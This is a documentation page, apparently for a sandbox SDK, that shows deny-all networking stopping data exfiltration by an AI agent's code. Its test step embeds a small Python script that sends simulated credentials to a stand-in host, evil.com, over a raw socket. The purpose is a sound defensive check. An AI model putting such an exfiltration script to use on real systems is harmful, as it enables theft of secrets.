Skip to main content

What You’ll Learn

  • Creating a sandbox with allow_internet_access=False to block all outbound traffic
  • Writing sensitive data (API keys, passwords) into the sandbox
  • Confirming HTTP exfiltration attempts are blocked
  • Understanding why DNS exfiltration is also prevented by deny-all
  • Verifying the data remains accessible locally within the sandbox

Scenario

An AI agent processes sensitive data (credentials, API keys) inside a sandbox. Even if the code is compromised or malicious, deny-all networking ensures it cannot exfiltrate data:
  1. Sensitive data is written into the sandbox
  2. Malicious code tries to POST the data to evil.comblocked
  3. DNS-based exfiltration (encoding data in DNS queries) is also impossible
  4. The data can still be read locally for legitimate processing

Prerequisites

This example is available in Python. TypeScript version coming soon.

Code Walkthrough

Create a sandbox with all outbound traffic denied: 
from declaw import Sandbox

sbx = Sandbox.create(
    template="python", timeout=300, allow_internet_access=False
)
Write simulated credentials into the sandbox: 
sbx.files.write(
    "/tmp/secrets.txt",
    "API_KEY=sk-secret-12345\nDB_PASSWORD=hunter2\n",
)
print("  Wrote /tmp/secrets.txt with simulated credentials.")
Attempt to exfiltrate via HTTP — the connection is blocked: 
EXFIL_SCRIPT = """
import socket
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(5)
    s.connect(("93.184.216.34", 80))  # example.com IP
    s.sendall(b"POST / HTTP/1.1\\r\\nHost: evil.com\\r\\n\\r\\nstolen-data")
    s.close()
    print("EXFILTRATED")
except Exception as e:
    print(f"BLOCKED: {e}")
"""

sbx.files.write("/tmp/exfil_test.py", EXFIL_SCRIPT)
result = sbx.commands.run("python3 /tmp/exfil_test.py", timeout=15)
print(f"  Output: {result.stdout.strip()}")

if "BLOCKED" in result.stdout:
    print("  [PASS] Data exfiltration was blocked.")
DNS exfiltration is inherently blocked — no outbound packets can leave: 
print("  With deny-all networking, DNS resolution is also blocked.")
print("  No outbound packets can leave the sandbox, so DNS-based")
print("  exfiltration (encoding data in DNS queries) is not possible.")
print("  [PASS] DNS exfiltration is inherently blocked by deny-all policy.")
Verify the data is still readable locally: 
content = sbx.files.read("/tmp/secrets.txt")
print(f"  Content: {content.strip()}")

if "sk-secret-12345" in content:
    print("  [PASS] Data is accessible locally within the sandbox.")

Expected Output

============================================================
Network Exfiltration Prevention Example
============================================================

--- Creating sandbox with all outbound traffic DENIED ---
Sandbox created: sbx_abc123

--- Step 1: Writing sensitive data into sandbox ---
  Wrote /tmp/secrets.txt with simulated credentials.

--- Step 2: Attempting to exfiltrate data via network ---
  Output: BLOCKED: timed out
  [PASS] Data exfiltration was blocked.

--- Step 3: DNS exfiltration ---
  With deny-all networking, DNS resolution is also blocked.
  No outbound packets can leave the sandbox, so DNS-based
  exfiltration (encoding data in DNS queries) is not possible.
  [PASS] DNS exfiltration is inherently blocked by deny-all policy.

--- Step 4: Reading sensitive data locally (should work) ---
  Content: API_KEY=sk-secret-12345
           DB_PASSWORD=hunter2
  [PASS] Data is accessible locally within the sandbox.

--- Cleaning Up ---
  Sandbox sbx_abc123 killed.

============================================================
Done!
============================================================